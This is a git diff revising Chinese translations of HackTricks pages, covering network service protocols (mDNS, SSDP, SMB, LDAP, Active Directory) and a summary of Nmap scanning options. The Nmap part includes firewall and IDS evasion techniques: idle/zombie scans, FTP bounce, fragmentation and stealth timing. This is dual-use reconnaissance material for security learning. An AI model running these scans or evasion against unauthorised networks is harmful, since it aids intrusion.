学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,75 +1,74 @@
|
|||
{% hint style="success" %}
|
||||
学习和实践 AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习和实践 GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
## 多播DNS(mDNS)
|
||||
## 多播 DNS (mDNS)
|
||||
|
||||
**mDNS**协议旨在在没有专用名称服务器的小型本地网络中进行IP地址解析。它通过在子网内进行多播查询来促使具有指定名称的主机响应其IP地址。然后,子网中的所有设备可以使用此信息更新其mDNS缓存。
|
||||
**mDNS** 协议旨在在没有专用名称服务器的小型本地网络中进行 IP 地址解析。它通过在子网内进行多播查询来促使具有指定名称的主机响应其 IP 地址。然后,子网中的所有设备可以使用此信息更新其 mDNS 缓存。
|
||||
|
||||
需要注意的关键点:
|
||||
- **域名放弃**:主机可以通过发送TTL为零的数据包释放其域名。
|
||||
- **使用限制**:mDNS通常仅解析以**.local**结尾的名称。在此域中与非mDNS主机的冲突需要进行网络配置调整。
|
||||
- **域名放弃**:主机可以通过发送 TTL 为零的数据包来释放其域名。
|
||||
- **使用限制**:mDNS 通常仅解析以 **.local** 结尾的名称。在此域中与非 mDNS 主机的冲突需要进行网络配置调整。
|
||||
- **网络详细信息**:
|
||||
- 以太网多播MAC地址:IPv4 - `01:00:5E:00:00:FB`,IPv6 - `33:33:00:00:00:FB`。
|
||||
- IP地址:IPv4 - `224.0.0.251`,IPv6 - `ff02::fb`。
|
||||
- 在UDP端口5353上运行。
|
||||
- mDNS查询限于本地网络,不会跨越路由器。
|
||||
- 以太网多播 MAC 地址:IPv4 - `01:00:5E:00:00:FB`,IPv6 - `33:33:00:00:00:FB`。
|
||||
- IP 地址:IPv4 - `224.0.0.251`,IPv6 - `ff02::fb`。
|
||||
- 在 UDP 端口 5353 上运行。
|
||||
- mDNS 查询限于本地网络,不会跨路由器。
|
||||
|
||||
## DNS-SD(服务发现)
|
||||
## DNS-SD (服务发现)
|
||||
|
||||
DNS-SD是一种通过查询特定域名(例如,`_printers._tcp.local`)来发现网络上的服务的协议。响应包括所有相关域,例如在此情况下可用的打印机。可以在[此处](http://www.dns-sd.org/ServiceTypes.html)找到服务类型的全面列表。
|
||||
DNS-SD 是一种通过查询特定域名(例如 `_printers._tcp.local`)来发现网络上服务的协议。响应包括所有相关域,例如在此情况下可用的打印机。可以在[这里](http://www.dns-sd.org/ServiceTypes.html)找到服务类型的全面列表。
|
||||
|
||||
## SSDP(简单服务发现协议)
|
||||
## SSDP (简单服务发现协议)
|
||||
|
||||
SSDP促进了网络服务的发现,主要由UPnP使用。它是一种使用UDP的基于文本的协议,使用多播寻址。对于IPv4,指定的多播地址是`239.255.255.250`。SSDP的基础是[HTTPU](https://en.wikipedia.org/wiki/HTTPU),这是HTTP的UDP扩展。
|
||||
SSDP 促进了网络服务的发现,主要由 UPnP 使用。它是一种基于文本的协议,使用 UDP 在端口 1900 上进行,具有多播寻址。对于 IPv4,指定的多播地址是 `239.255.255.250`。SSDP 的基础是 [HTTPU](https://en.wikipedia.org/wiki/HTTPU),这是用于 UDP 的 HTTP 扩展。
|
||||
|
||||
## 设备的Web服务(WSD)
|
||||
|
||||
连接到网络的设备可以通过Web服务(WSD)识别可用的服务,如打印机。这涉及广播UDP数据包。寻找服务的设备发送请求,而服务提供者宣布其提供的服务。
|
||||
## 设备 Web 服务 (WSD)
|
||||
连接到网络的设备可以通过 Web 服务来识别可用服务,例如打印机。这涉及广播 UDP 数据包。寻找服务的设备发送请求,而服务提供者宣布其提供的服务。
|
||||
|
||||
## OAuth 2.0
|
||||
|
||||
OAuth 2.0是一种协议,促进了用户信息的安全、选择性共享。例如,它使服务能够从Google访问用户数据而无需多次登录。该过程涉及用户身份验证,用户授权,以及Google生成令牌,允许服务访问指定用户数据。
|
||||
OAuth 2.0 是一种协议,促进了用户信息在服务之间的安全、选择性共享。例如,它使服务能够从 Google 访问用户数据而无需多次登录。该过程涉及用户身份验证、用户授权以及 Google 生成令牌,允许服务访问指定用户数据。
|
||||
|
||||
## RADIUS
|
||||
RADIUS(远程身份验证拨号用户服务)是主要由 ISP 使用的网络访问协议。它支持身份验证、授权和计费。用户凭据由 RADIUS 服务器验证,可能包括网络地址验证以增加安全性。身份验证后,用户获得网络访问,并跟踪其会话详细信息以进行计费和统计目的。
|
||||
|
||||
RADIUS(远程身份验证拨号用户服务)是主要由ISP使用的网络访问协议。它支持身份验证、授权和计费。用户凭据由RADIUS服务器验证,可能包括网络地址验证以增加安全性。身份验证后,用户获得网络访问,并跟踪其会话详细信息以进行计费和统计目的。
|
||||
## SMB 和 NetBIOS
|
||||
|
||||
## SMB和NetBIOS
|
||||
### SMB (服务器消息块)
|
||||
SMB 是用于共享文件、打印机和端口的协议。它直接通过 TCP(端口 445)或通过 TCP 上的 NetBIOS(端口 137、138)运行。这种双重兼容性增强了与各种设备的连接。
|
||||
|
||||
### SMB(服务器消息块)
|
||||
SMB是用于共享文件、打印机和端口的协议。它直接通过TCP(端口445)或通过TCP上的NetBIOS(端口137、138)运行。这种双重兼容性增强了与各种设备的连接。
|
||||
### NetBIOS (网络基本输入/输出系统)
|
||||
NetBIOS 管理资源共享的网络会话和连接。它支持设备的唯一名称和多个设备的组名称,从而实现定向或广播消息传递。通信可以是无连接的(无确认)或面向连接的(基于会话)。虽然 NetBIOS 传统上在诸如 IPC/IPX 的协议上运行,但它通常在 TCP/IP 上使用。关联的协议 NetBEUI 以其速度而闻名,但由于广播而非常冗长。
|
||||
|
||||
### NetBIOS(网络基本输入/输出系统)
|
||||
NetBIOS管理资源共享的网络会话和连接。它支持设备的唯一名称和多个设备的组名称,从而实现定向或广播消息传递。通信可以是无连接的(无确认)或面向连接的(基于会话)。虽然NetBIOS传统上在诸如IPC/IPX之类的协议上运行,但它通常在TCP/IP上使用。NetBEUI是一个相关协议,以其速度而闻名,但由于广播而非常冗长。
|
||||
## LDAP (轻量级目录访问协议)
|
||||
LDAP 是一种协议,通过 TCP/IP 实现对目录信息的管理和访问。它支持各种操作来查询和修改目录信息。主要用于访问和维护分布式目录信息服务,允许与设计用于 LDAP 通信的数据库进行交互。
|
||||
|
||||
## LDAP(轻量级目录访问协议)
|
||||
LDAP是一种协议,允许在TCP/IP上管理和访问目录信息。它支持各种操作来查询和修改目录信息。主要用于访问和维护分布式目录信息服务,允许与设计用于LDAP通信的数据库进行交互。
|
||||
## Active Directory (AD)
|
||||
Active Directory 是一个网络可访问的数据库,包含用户、组、特权和资源等对象,便于对网络实体进行集中管理。AD 将其数据组织成域的分层结构,该结构可以包含服务器、组和用户。子域允许进一步分段,每个子域可能维护自己的服务器和用户基础。这种结构集中管理用户,授予或限制对网络资源的访问。可以进行查询以检索特定信息,例如联系方式,或定位域内的资源,例如打印机。
|
||||
|
||||
## Active Directory(AD)
|
||||
Active Directory是一个网络可访问的数据库,包含用户、组、特权和资源等对象,便于对网络实体进行集中管理。AD将其数据组织成域的分层结构,可以包含服务器、组和用户。子域允许进一步分段,每个子域可能维护自己的服务器和用户群。这种结构集中管理用户,授予或限制对网络资源的访问。可以进行查询以检索特定信息,如联系方式,或定位域内的资源,如打印机。
|
||||
{% hint style="success" %}
|
||||
学习和实践 AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习和实践 GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,18 +1,19 @@
|
|||
# Nmap 总结(ESP)
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家(GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS 红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持 HackTricks 的其他方式:
|
||||
|
||||
- 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
- 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
|
||||
- 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
- **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
- 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
@ -36,12 +37,12 @@ nmap -sV -sC -O -n -oA nmapscan 192.168.0.1/24
|
|||
* **`-Pn`**: 无ping。如果您知道它们都是活动的(否则,您可能会浪费很多时间,但此选项也会产生虚假负面结果,表示它们不活动),它可以防止发现阶段。
|
||||
* **`-sn`** : 无端口扫描。完成侦察阶段后,不扫描端口。相对隐蔽,允许进行小范围网络扫描。具有特权时,发送一个ACK(-PA)到80端口,一个SYN(-PS)到443端口,以及一个回显请求和一个时间戳请求,没有特权时总是完成连接。如果目标是网络,则仅使用ARP(-PR)。如果与另一个选项一起使用,则仅丢弃另一个选项的数据包。
|
||||
* **`-PR`**: ARP Ping。在分析我们网络中的计算机时,默认使用它,比使用ping更快。如果不想使用ARP数据包,请使用 `--send-ip`。
|
||||
* **`-PS <ports>`**: 发送SYN数据包,如果回答SYN/ACK则为开放(回答RST以避免结束连接),如果回答RST则为关闭,如果不回答则为不可达。如果没有特权,则自动使用完整连接。如果未指定端口,则默认为80端口。
|
||||
* **`-PA <ports>`**: 与前一个类似,但使用ACK,结合两者效果更好。
|
||||
* **`-PU <ports>`**: 目标相反,发送到预计关闭的端口。一些防火墙仅检查TCP连接。如果关闭,则回答端口不可达,如果回答其他ICMP或不回答,则保持为目标不可达。
|
||||
* **`-PS <ports>`**: 发送SYN数据包,如果回答SYN/ACK则为开放(回答RST以避免结束连接),如果回答RST则为关闭,如果不回答则为不可达。如果没有特权,将自动使用完整连接。如果未指定端口,则默认为80端口。
|
||||
* **`-PA <ports>`**: 与前一个类似,但使用ACK,结合两者可以获得更好的结果。
|
||||
* **`-PU <ports>`**: 目标相反,发送到预计关闭的端口。某些防火墙仅检查TCP连接。如果关闭,则回答端口不可达,如果回答其他ICMP或不回答,则保持为目标不可达。
|
||||
* **`-PE, -PP, -PM`** : ICMP PINGS: 回显回复,时间戳和地址掩码。用于确定目标是否活动。
|
||||
* **`-PY<ports>`**: 默认发送SCTP INIT探测到80端口,INIT-ACK(开放)或ABORT(关闭)或无回应或ICMP不可达(不活动)可能会回复。
|
||||
* **`-PO <protocols>`**: 在标头中指定协议,默认为1(ICMP),2(IGMP)和4(Encap IP)。对于ICMP、IGMP、TCP(6)和UDP(17)协议,发送协议标头,对于其余协议仅发送IP标头。目的是通过标头的畸形,回答协议不可达或相同协议的响应,以了解其是否在线。
|
||||
* **`-PY<ports>`**: 默认发送SCTP INIT探测到80端口,INIT-ACK(开放)或ABORT(关闭)或无响应或ICMP不可达(不活动)可能会回复。
|
||||
* **`-PO <protocols>`**: 在标头中指定协议,默认为1(ICMP),2(IGMP)和4(Encap IP)。对于ICMP、IGMP、TCP(6)和UDP(17)协议,发送协议标头,对于其余协议仅发送IP标头。目的是通过标头的畸形,回答协议不可达或相同协议的响应,以了解目标是否活动。
|
||||
* **`-n`**: 无DNS
|
||||
* **`-R`**: 始终DNS
|
||||
|
||||
|
@ -49,20 +50,20 @@ nmap -sV -sC -O -n -oA nmapscan 192.168.0.1/24
|
|||
|
||||
* **`-sS`**: 不完成连接,因此不留下痕迹,如果可以使用非常好(特权)。默认使用此选项。
|
||||
* **`-sT`**: 完成连接,因此会留下痕迹,但可以确保使用。默认情况下无需特权。
|
||||
* **`-sU`**: 较慢,用于UDP。主要用于:DNS(53), SNMP(161,162), DHCP(67和68), (-sU53,161,162,67,68): 开放(回复),关闭(端口不可达),过滤(其他ICMP),开放/过滤(无回应)。对于开放/过滤,-sV发送大量请求以检测nmap支持的任何版本,并可以检测真实状态。这会大大增加时间。
|
||||
* **`-sY`**: SCTP协议无法建立连接,因此没有日志,类似于 -PY
|
||||
* **`-sN,-sX,-sF`:** Null, Fin, Xmas,可以穿透一些防火墙并提取信息。基于符合标准的机器应该用RST回复所有没有SYN、RST或ACK标志的请求:开放/过滤(无回应),关闭(RST),过滤(ICMP不可达)。在Windows、CIsco、BSDI和OS/400上不可靠。在Unix上是的。
|
||||
* **`-sU`**: 较慢,用于UDP。主要用于:DNS(53), SNMP(161,162), DHCP(67和68), (-sU53,161,162,67,68): 开放(回复),关闭(端口不可达),过滤(其他ICMP),开放/过滤(无响应)。对于开放/过滤,-sV发送大量请求以检测nmap支持的任何版本,并可以检测真实状态。这会大大增加时间。
|
||||
* **`-sY`**: SCTP协议无法建立连接,因此没有日志,类似于-PY
|
||||
* **`-sN,-sX,-sF`:** Null, Fin, Xmas,可以穿透一些防火墙并提取信息。基于符合标准的机器应该用RST回复所有没有SYN、RST或ACK标志的请求:开放/过滤(无响应),关闭(RST),过滤(ICMP不可达)。在Windows、CIsco、BSDI和OS/400上不可靠。在Unix上是可靠的。
|
||||
* **`-sM`**: Maimon扫描:发送FIN和ACK标志,用于BSD,目前将所有返回为关闭。
|
||||
* **`-sA, sW`**: ACK和Window,用于检测防火墙,了解端口是否被过滤。-sW可以区分开放/关闭,因为开放的会用不同的窗口值回复:开放(带有非0窗口的RST),关闭(RST窗口=0),过滤(ICMP不可达或无回应)。并非所有计算机都按此方式工作,因此如果全部关闭,则不起作用,如果有一些开放,则正常工作,如果有许多开放和少数关闭,则工作方式相反。
|
||||
* **`-sI`:** 空闲扫描。对于存在主动防火墙但我们知道它不会过滤到某个IP的情况(或者当我们只是想要匿名时),我们可以使用僵尸扫描器(适用于所有端口),寻找可能的僵尸主机,我们可以使用脚本ipidseq或exploit auxiliary/scanner/ip/ipidseq。此扫描器基于IP数据包的IPID编号。
|
||||
* **`--badsum`:** 发送错误的校验和,计算机会丢弃数据包,但防火墙可能会回复,用于检测防火墙。
|
||||
* **`-sZ`:** “奇怪”的SCTP扫描器,通过发送带有cookie回显片段的探测,如果开放则应该被丢弃,如果关闭则应该回复ABORT。可以穿过init无法穿过的防火墙,不好的是它无法区分过滤和开放。
|
||||
* **`-sO`:** 协议IP扫描。发送错误和空标头,有时甚至无法区分协议。如果到达ICMP不可达协议,则为关闭,如果到达不可达端口,则为开放,如果到达其他错误,则为过滤,如果没有到达任何内容,则为开放|过滤。
|
||||
* **`-b <server>`:** FTPhost--> 用于从另一台主机扫描主机,通过连接另一台机器的ftp,并要求其向您要扫描的端口发送文件,根据回复我们将知道它们是否开放。 \[\<user>:\<password>@]\<server>\[:\<port>] 几乎所有ftp服务器现在不允许您这样做,因此实用性不大。
|
||||
* **`-sA, sW`**: ACK和Window,用于检测防火墙,了解端口是否被过滤。-sW可以区分开放/关闭,因为开放的端口会用不同的窗口值回复:开放(带有非0窗口的RST),关闭(窗口=0的RST),过滤(ICMP不可达或无响应)。并非所有计算机都按此方式工作,因此如果全部关闭,则不起作用,如果有一些开放,则正常工作,如果有许多开放和少数关闭,则反向工作。
|
||||
* **`-sI`:** 空闲扫描。对于存在主动防火墙但我们知道它不会过滤到某个IP的情况(或者当我们只是想要匿名时),我们可以使用僵尸扫描器(适用于所有端口),要查找可能的僵尸,我们可以使用脚本ipidseq或exploit auxiliary/scanner/ip/ipidseq。此扫描器基于IP数据包的IPID编号。
|
||||
* **`--badsum`:** 发送错误的校验和,计算机将丢弃数据包,但防火墙可能会回复,用于检测防火墙。
|
||||
* **`-sZ`:** “奇怪”的SCTP扫描器,通过发送带有cookie回显片段的探测,如果开放则应该被丢弃,如果关闭则应该回复ABORT。可以通过无法通过init的防火墙,不好的是它不能区分过滤和开放。
|
||||
* **`-sO`:** 协议IP扫描。发送错误和空标头,有时甚至无法区分协议。如果收到ICMP不可达协议,则为关闭,如果收到不可达端口,则为开放,如果收到其他错误,则为过滤,如果没有收到任何内容,则为开放|过滤。
|
||||
* **`-b <server>`:** FTPhost--> 用于从另一台主机扫描主机,通过连接另一台机器的ftp,并要求其向您要扫描的端口发送文件,根据答复我们将知道它们是否开放。 \[\<user>:\<password>@]\<server>\[:\<port>] 几乎所有ftp服务器现在不允许您这样做,因此实用性很小。
|
||||
|
||||
### **中心化分析**
|
||||
### **集中分析**
|
||||
|
||||
**-p:** 用于指定要扫描的端口。要选择65335个端口:**-p-** 或 **-p all**。Nmap根据其流行度有内部分类。默认使用前1000个主要端口。使用 **-F**(快速扫描)分析前100个主要端口。使用 **--top-ports \<number>** 分析指定数量的主要端口(从1到65335)。按随机顺序检查端口,为了避免这种情况,使用 **-r**。还可以选择端口范围:20-30,80,443,1024- 这表示查看1024之后的端口。还可以按协议分组端口:U:53,T:21-25,80,139,S:9。还可以选择nmap中常用端口范围内的范围:-p \[-1024] 分析nmap-services中包含的端口直到1024。**--port-ratio \<ratio>** 分析常见端口,比率必须介于0和1之间。
|
||||
**-p:** 用于指定要扫描的端口。要选择65335个端口:**-p-** 或 **-p all**。Nmap根据其流行度有内部分类。默认使用前1000个主要端口。使用 **-F**(快速扫描)分析前100个主要端口。使用 **--top-ports \<number>** 分析指定数量的主要端口(从1到65335)。按随机顺序检查端口,为了避免这种情况,使用 **-r**。还可以选择端口范围:20-30,80,443,1024- 这表示从1024开始查看。还可以按协议分组端口:U:53,T:21-25,80,139,S:9。还可以选择nmap中常用端口范围内的范围:-p \[-1024] 分析nmap-services中包含的端口直到1024。**--port-ratio \<ratio>** 分析常见端口,比率必须介于0和1之间。
|
||||
|
||||
**-sV** 版本扫描,可以调整强度从0到9,默认为7。
|
||||
|
||||
|
@ -87,7 +88,7 @@ nmap -sV -sC -O -n -oA nmapscan 192.168.0.1/24
|
|||
* **External:** 用于使用外部资源的脚本
|
||||
* **Intrusive:** 使用被认为对受害者或目标具有侵入性的脚本
|
||||
* **Malware:** 检查是否存在恶意代码或后门打开的连接
|
||||
* **Safe:** 运行不具有侵入性的脚本
|
||||
* **Safe:** 运行非侵入性脚本
|
||||
* **Vuln:** 发现最常见的漏洞
|
||||
* **All:** 运行所有可用的NSE扩展脚本
|
||||
|
||||
|
@ -113,19 +114,19 @@ nmap -sV -sC -O -n -oA nmapscan 192.168.0.1/24
|
|||
|
||||
\--script-updatedb
|
||||
|
||||
**要使用单个脚本,只需输入:nmap --script ScriptName target** --> 输入脚本将同时运行脚本和扫描程序,因此也可以添加扫描程序选项,可以添加 **“safe=1”** 以仅运行安全脚本。
|
||||
**要使用单个脚本,只需输入:nmap --script ScriptName target** --> 输入脚本将同时运行脚本和扫描器,因此也可以添加扫描器选项,可以添加 **“safe=1”** 以仅运行安全脚本。
|
||||
|
||||
**时间控制**
|
||||
|
||||
**Nmap可以调整时间单位为秒、分钟、毫秒:** --host-timeout 参数 900000ms、900、900s 和 15m 都是相同的。
|
||||
**Nmap可以调整时间单位为秒、分钟、毫秒:** --host-timeout arguments 900000ms, 900, 900s, and 15m 都是相同的。
|
||||
|
||||
Nmap将要扫描的主机总数分成组,并以块的形式分析这些组,直到所有组都被分析完毕,才会转移到下一个块(用户在块被分析之前也不会收到任何更新),这样,对于nmap来说,使用大组更为高效。默认情况下,在C类中使用256。
|
||||
Nmap将要扫描的主机总数分成组,并以块的形式分析这些组,直到所有组都被分析完毕,才会转移到下一个块(用户也不会在分析块之前收到任何更新),这样,对于nmap来说使用大组更为高效。默认情况下,在C类中使用256。
|
||||
|
||||
可以使用\*\*--min-hostgroup\*\* _**\<numhosts>**_**;** **--max-hostgroup** _**\<numhosts>**_(调整并行扫描组大小)
|
||||
|
||||
可以控制并行扫描器的数量,但最好不要这样做(nmap已根据网络状态自动进行控制):**--min-parallelism** _**\<numprobes>**_**;** **--max-parallelism** _**\<numprobes>**_
|
||||
|
||||
可以修改 rtt 超时时间,但通常不需要:**--min-rtt-timeout** _**\<time>**_**,** **--max-rtt-timeout** _**\<time>**_**,** **--initial-rtt-timeout** _**\<time>**_
|
||||
可以调整rtt超时时间,但通常不需要:**--min-rtt-timeout** _**\<time>**_**,** **--max-rtt-timeout** _**\<time>**_**,** **--initial-rtt-timeout** _**\<time>**_
|
||||
|
||||
可以修改尝试次数:**--max-retries** _**\<numtries>**_
|
||||
|
||||
|
@ -135,15 +136,15 @@ Nmap将要扫描的主机总数分成组,并以块的形式分析这些组,
|
|||
|
||||
可以调整每秒发送的数据包数量:**--min-rate** _**\<number>**_**;** **--max-rate** _**\<number>**_
|
||||
|
||||
许多端口由于被过滤或关闭而响应时间较长,如果只关注已打开的端口,可以使用以下选项加快速度:**--defeat-rst-ratelimit**
|
||||
许多端口由于被过滤或关闭而响应速度较慢,如果只关注打开的端口,可以使用以下选项加快速度:**--defeat-rst-ratelimit**
|
||||
|
||||
用于定义 nmap 攻击强度:-T paranoid|sneaky|polite|normal|aggressive|insane
|
||||
用于定义nmap攻击强度:-T paranoid|sneaky|polite|normal|aggressive|insane
|
||||
|
||||
\-T (0-5)
|
||||
|
||||
\-T0 --> 一次只扫描一个端口,等待5分钟才进行下一个
|
||||
|
||||
\-T1 和 T2 --> 非常相似,但分别等待15秒和0.4秒进行下一个测试
|
||||
\-T1和T2 --> 非常相似,但分别等待15秒和0.4秒进行下一个测试
|
||||
|
||||
\-T3 --> 默认操作,包括并行操作
|
||||
|
||||
|
@ -153,38 +154,38 @@ Nmap将要扫描的主机总数分成组,并以块的形式分析这些组,
|
|||
|
||||
**防火墙/IDS**
|
||||
|
||||
阻止端口通信并分析数据包。
|
||||
防火墙和入侵检测系统(IDS)阻止端口通信并分析数据包。
|
||||
|
||||
**-f** 用于分片数据包,默认情况下在头部之后每8字节分片一次,要指定大小,请使用 ..mtu(在这种情况下,不要使用 -f),偏移量必须是8的倍数。**版本扫描器和脚本不支持分片**
|
||||
**-f** 用于分片数据包,默认在头部后分片为8字节,要指定大小使用..mtu(不要与-f一起使用),偏移必须是8的倍数。**版本扫描器和脚本不支持分片**
|
||||
|
||||
